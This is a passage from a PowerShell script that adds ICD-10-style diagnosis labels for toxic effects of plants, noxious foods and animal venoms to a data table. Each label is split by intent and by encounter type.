assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, undetermined","Toxic effect of ingested mushrooms, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, undetermined","Toxic effect of ingested mushrooms, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested mushrooms, undetermined","Toxic effect of ingested mushrooms, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, accidental (unintentional)","Toxic effect of ingested berries, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, accidental (unintentional)","Toxic effect of ingested berries, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, accidental (unintentional)","Toxic effect of ingested berries, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, intentional self-harm","Toxic effect of ingested berries, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, intentional self-harm","Toxic effect of ingested berries, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, intentional self-harm","Toxic effect of ingested berries, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, assault","Toxic effect of ingested berries, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, assault","Toxic effect of ingested berries, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, assault","Toxic effect of ingested berries, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, undetermined","Toxic effect of ingested berries, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, undetermined","Toxic effect of ingested berries, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of ingested berries, undetermined","Toxic effect of ingested berries, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), accidental (unintentional)","Toxic effect of other ingested (parts of) plant(s), accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), accidental (unintentional)","Toxic effect of other ingested (parts of) plant(s), accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), accidental (unintentional)","Toxic effect of other ingested (parts of) plant(s), accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), intentional self-harm","Toxic effect of other ingested (parts of) plant(s), intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), intentional self-harm","Toxic effect of other ingested (parts of) plant(s), intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), intentional self-harm","Toxic effect of other ingested (parts of) plant(s), intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), assault","Toxic effect of other ingested (parts of) plant(s), assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), assault","Toxic effect of other ingested (parts of) plant(s), assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), assault","Toxic effect of other ingested (parts of) plant(s), assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), undetermined","Toxic effect of other ingested (parts of) plant(s), undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), undetermined","Toxic effect of other ingested (parts of) plant(s), undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other ingested (parts of) plant(s), undetermined","Toxic effect of other ingested (parts of) plant(s), undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, accidental (unintentional)","Toxic effect of other specified noxious substances eaten as food, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, accidental (unintentional)","Toxic effect of other specified noxious substances eaten as food, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, accidental (unintentional)","Toxic effect of other specified noxious substances eaten as food, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, intentional self-harm","Toxic effect of other specified noxious substances eaten as food, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, intentional self-harm","Toxic effect of other specified noxious substances eaten as food, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, intentional self-harm","Toxic effect of other specified noxious substances eaten as food, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, assault","Toxic effect of other specified noxious substances eaten as food, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, assault","Toxic effect of other specified noxious substances eaten as food, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, assault","Toxic effect of other specified noxious substances eaten as food, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, undetermined","Toxic effect of other specified noxious substances eaten as food, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, undetermined","Toxic effect of other specified noxious substances eaten as food, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified noxious substances eaten as food, undetermined","Toxic effect of other specified noxious substances eaten as food, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional)","Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional)","Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional)","Toxic effect of unspecified noxious substance eaten as food, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, intentional self-harm","Toxic effect of unspecified noxious substance eaten as food, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, intentional self-harm","Toxic effect of unspecified noxious substance eaten as food, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, intentional self-harm","Toxic effect of unspecified noxious substance eaten as food, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, assault","Toxic effect of unspecified noxious substance eaten as food, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, assault","Toxic effect of unspecified noxious substance eaten as food, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, assault","Toxic effect of unspecified noxious substance eaten as food, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, undetermined","Toxic effect of unspecified noxious substance eaten as food, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, undetermined","Toxic effect of unspecified noxious substance eaten as food, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified noxious substance eaten as food, undetermined","Toxic effect of unspecified noxious substance eaten as food, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, accidental (unintentional)","Toxic effect of unspecified snake venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, accidental (unintentional)","Toxic effect of unspecified snake venom, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, accidental (unintentional)","Toxic effect of unspecified snake venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, intentional self-harm","Toxic effect of unspecified snake venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, intentional self-harm","Toxic effect of unspecified snake venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, intentional self-harm","Toxic effect of unspecified snake venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, assault","Toxic effect of unspecified snake venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, assault","Toxic effect of unspecified snake venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, assault","Toxic effect of unspecified snake venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, undetermined","Toxic effect of unspecified snake venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, undetermined","Toxic effect of unspecified snake venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified snake venom, undetermined","Toxic effect of unspecified snake venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, accidental (unintentional)","Toxic effect of rattlesnake venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, accidental (unintentional)","Toxic effect of rattlesnake venom, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, accidental (unintentional)","Toxic effect of rattlesnake venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, intentional self-harm","Toxic effect of rattlesnake venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, intentional self-harm","Toxic effect of rattlesnake venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, intentional self-harm","Toxic effect of rattlesnake venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, assault","Toxic effect of rattlesnake venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, assault","Toxic effect of rattlesnake venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, assault","Toxic effect of rattlesnake venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, undetermined","Toxic effect of rattlesnake venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, undetermined","Toxic effect of rattlesnake venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of rattlesnake venom, undetermined","Toxic effect of rattlesnake venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, accidental (unintentional)","Toxic effect of coral snake venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, accidental (unintentional)","Toxic effect of coral snake venom, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, accidental (unintentional)","Toxic effect of coral snake venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, intentional self-harm","Toxic effect of coral snake venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, intentional self-harm","Toxic effect of coral snake venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, intentional self-harm","Toxic effect of coral snake venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, assault","Toxic effect of coral snake venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, assault","Toxic effect of coral snake venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, assault","Toxic effect of coral snake venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, undetermined","Toxic effect of coral snake venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, undetermined","Toxic effect of coral snake venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of coral snake venom, undetermined","Toxic effect of coral snake venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, accidental (unintentional)","Toxic effect of taipan venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, accidental (unintentional)","Toxic effect of taipan venom, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, accidental (unintentional)","Toxic effect of taipan venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, intentional self-harm","Toxic effect of taipan venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, intentional self-harm","Toxic effect of taipan venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, intentional self-harm","Toxic effect of taipan venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, assault","Toxic effect of taipan venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, assault","Toxic effect of taipan venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, assault","Toxic effect of taipan venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, undetermined","Toxic effect of taipan venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, undetermined","Toxic effect of taipan venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of taipan venom, undetermined","Toxic effect of taipan venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, accidental (unintentional)","Toxic effect of cobra venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, accidental (unintentional)","Toxic effect of cobra venom, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, accidental (unintentional)","Toxic effect of cobra venom, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, intentional self-harm","Toxic effect of cobra venom, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, intentional self-harm","Toxic effect of cobra venom, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, intentional self-harm","Toxic effect of cobra venom, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, assault","Toxic effect of cobra venom, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, assault","Toxic effect of cobra venom, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, assault","Toxic effect of cobra venom, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, undetermined","Toxic effect of cobra venom, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, undetermined","Toxic effect of cobra venom, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of cobra venom, undetermined","Toxic effect of cobra venom, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, accidental (unintentional)","Toxic effect of venom of other North and South American snake, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, accidental (unintentional)","Toxic effect of venom of other North and South American snake, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, accidental (unintentional)","Toxic effect of venom of other North and South American snake, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, intentional self-harm","Toxic effect of venom of other North and South American snake, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, intentional self-harm","Toxic effect of venom of other North and South American snake, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, intentional self-harm","Toxic effect of venom of other North and South American snake, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, assault","Toxic effect of venom of other North and South American snake, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, assault","Toxic effect of venom of other North and South American snake, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, assault","Toxic effect of venom of other North and South American snake, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, undetermined","Toxic effect of venom of other North and South American snake, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, undetermined","Toxic effect of venom of other North and South American snake, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other North and South American snake, undetermined","Toxic effect of venom of other North and South American snake, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, accidental (unintentional)","Toxic effect of venom of other Australian snake, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, accidental (unintentional)","Toxic effect of venom of other Australian snake, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, accidental (unintentional)","Toxic effect of venom of other Australian snake, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, intentional self-harm","Toxic effect of venom of other Australian snake, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, intentional self-harm","Toxic effect of venom of other Australian snake, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, intentional self-harm","Toxic effect of venom of other Australian snake, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, assault","Toxic effect of venom of other Australian snake, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, assault","Toxic effect of venom of other Australian snake, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, assault","Toxic effect of venom of other Australian snake, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, undetermined","Toxic effect of venom of other Australian snake, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, undetermined","Toxic effect of venom of other Australian snake, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other Australian snake, undetermined","Toxic effect of venom of other Australian snake, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, accidental (unintentional)","Toxic effect of venom of other African and Asian snake, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, accidental (unintentional)","Toxic effect of venom of other African and Asian snake, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, accidental (unintentional)","Toxic effect of venom of other African and Asian snake, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, intentional self-harm","Toxic effect of venom of other African and Asian snake, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, intentional self-harm","Toxic effect of venom of other African and Asian snake, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, intentional self-harm","Toxic effect of venom of other African and Asian snake, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, assault","Toxic effect of venom of other African and Asian snake, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, assault","Toxic effect of venom of other African and Asian snake, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, assault","Toxic effect of venom of other African and Asian snake, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, undetermined","Toxic effect of venom of other African and Asian snake, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, undetermined","Toxic effect of venom of other African and Asian snake, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other African and Asian snake, undetermined","Toxic effect of venom of other African and Asian snake, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, accidental (unintentional)","Toxic effect of venom of other snake, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, accidental (unintentional)","Toxic effect of venom of other snake, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, accidental (unintentional)","Toxic effect of venom of other snake, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, intentional self-harm","Toxic effect of venom of other snake, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, intentional self-harm","Toxic effect of venom of other snake, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, intentional self-harm","Toxic effect of venom of other snake, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, assault","Toxic effect of venom of other snake, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, assault","Toxic effect of venom of other snake, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, assault","Toxic effect of venom of other snake, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, undetermined","Toxic effect of venom of other snake, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, undetermined","Toxic effect of venom of other snake, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other snake, undetermined","Toxic effect of venom of other snake, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, accidental (unintentional)","Toxic effect of venom of gila monster, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, accidental (unintentional)","Toxic effect of venom of gila monster, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, accidental (unintentional)","Toxic effect of venom of gila monster, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, intentional self-harm","Toxic effect of venom of gila monster, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, intentional self-harm","Toxic effect of venom of gila monster, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, intentional self-harm","Toxic effect of venom of gila monster, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, assault","Toxic effect of venom of gila monster, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, assault","Toxic effect of venom of gila monster, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, assault","Toxic effect of venom of gila monster, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, undetermined","Toxic effect of venom of gila monster, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, undetermined","Toxic effect of venom of gila monster, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of gila monster, undetermined","Toxic effect of venom of gila monster, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, accidental (unintentional)","Toxic effect of venom of other venomous lizard, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, accidental (unintentional)","Toxic effect of venom of other venomous lizard, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, accidental (unintentional)","Toxic effect of venom of other venomous lizard, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, intentional self-harm","Toxic effect of venom of other venomous lizard, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, intentional self-harm","Toxic effect of venom of other venomous lizard, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, intentional self-harm","Toxic effect of venom of other venomous lizard, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, assault","Toxic effect of venom of other venomous lizard, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, assault","Toxic effect of venom of other venomous lizard, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, assault","Toxic effect of venom of other venomous lizard, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, undetermined","Toxic effect of venom of other venomous lizard, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, undetermined","Toxic effect of venom of other venomous lizard, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other venomous lizard, undetermined","Toxic effect of venom of other venomous lizard, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, accidental (unintentional)","Toxic effect of venom of other reptiles, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, accidental (unintentional)","Toxic effect of venom of other reptiles, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, accidental (unintentional)","Toxic effect of venom of other reptiles, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, intentional self-harm","Toxic effect of venom of other reptiles, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, intentional self-harm","Toxic effect of venom of other reptiles, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, intentional self-harm","Toxic effect of venom of other reptiles, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, assault","Toxic effect of venom of other reptiles, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, assault","Toxic effect of venom of other reptiles, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, assault","Toxic effect of venom of other reptiles, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, undetermined","Toxic effect of venom of other reptiles, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, undetermined","Toxic effect of venom of other reptiles, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of other reptiles, undetermined","Toxic effect of venom of other reptiles, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, accidental (unintentional)","Toxic effect of venom of scorpion, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, accidental (unintentional)","Toxic effect of venom of scorpion, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, accidental (unintentional)","Toxic effect of venom of scorpion, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, intentional self-harm","Toxic effect of venom of scorpion, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, intentional self-harm","Toxic effect of venom of scorpion, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, intentional self-harm","Toxic effect of venom of scorpion, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, assault","Toxic effect of venom of scorpion, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, assault","Toxic effect of venom of scorpion, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, assault","Toxic effect of venom of scorpion, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, undetermined","Toxic effect of venom of scorpion, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, undetermined","Toxic effect of venom of scorpion, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of venom of scorpion, undetermined","Toxic effect of venom of scorpion, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, accidental (unintentional)","Toxic effect of unspecified spider venom, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified spider venom, accidental (unintentional)","Toxic effect of unspecified spider venom, 